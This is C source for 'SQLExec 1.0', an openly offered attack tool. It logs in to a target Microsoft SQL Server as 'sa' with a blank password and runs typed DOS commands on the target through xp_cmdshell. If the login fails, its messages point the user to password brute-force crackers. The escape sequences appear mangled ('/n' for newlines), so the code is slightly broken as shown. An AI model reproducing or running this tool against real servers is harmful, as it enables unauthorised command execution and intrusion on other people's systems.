#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>
int main(int argc, char *argv[])
{
SQLCHAR Host[512]="";
SQLCHAR *User=";UID=sa";
SQLCHAR *Pass=";PWD=";
SQLCHAR *Database="";
SQLCHAR InConnectionString[1025]="";
SQLCHAR rowBuff[200]="";
SQLINTEGER iRowBuff;
UCHAR Query[1500]="";
UCHAR Cmd[300]="";
char inBuff[1025]="";
SQLRETURN nResult;
SWORD sLen;
SQLHDBC hDbc;
HSTMT hStmt;
SQLHANDLE hEnvironment;
int retries = 0;
if(argc !=2)
{
printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X-------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
printf("/nUsage : SQLExec <Hostname> /n!!!!(Do not use ip addresses of targets)!!!!/n");
return 0;
}
printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X----------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
memset(Query,0,1499);
strcpy(Host,argv[1]);
sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
{
printf("SQLAllocHandle returned an error!/n");
return 0;
}
if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
printf("SQLSetEnvAttr returned an error!/n");
return 0;
}
if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
{
printf("SQLAllocHandle returned an error!/n");
return 0;
}
while(retries < 4)
{
nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
strlen(InConnectionString),
inBuff, 1024, &sLen,
SQL_DRIVER_COMPLETE_REQUIRED);
if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
{
printf("Ok.You have connected to MASTER database.../n");
SQLAllocStmt(hDbc,&hStmt);
break;
}
else
{
if(retries == 3)
{
printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
"If you are using dial-up connection retry for a few times./n"
"If you are sure that SQL server is installed on the target check that port 1433 is open./n"
"If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
"Get a SQL server brute force cracker , try to hack passwords and try again./n"
"If you are a script kiddy then go (www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");
return 0;
}
retries++;
printf("Performing retry(%d).../n",retries);
Sleep(5000);
}
}
printf("Now type dos command(s) to execute :");
fgets(Cmd,299,stdin);
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
printf("Trying to execute %s on the target/n",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
while (nResult != SQL_ERROR)
{
memset(rowBuff,0,99);
nResult = SQLFetch(hStmt);
if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
{
printf("Error while fething the results from the stored proc./n");
}
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){
SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
printf("%s /n",rowBuff);
} else
{
break;
}
}
SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);
return 0;
}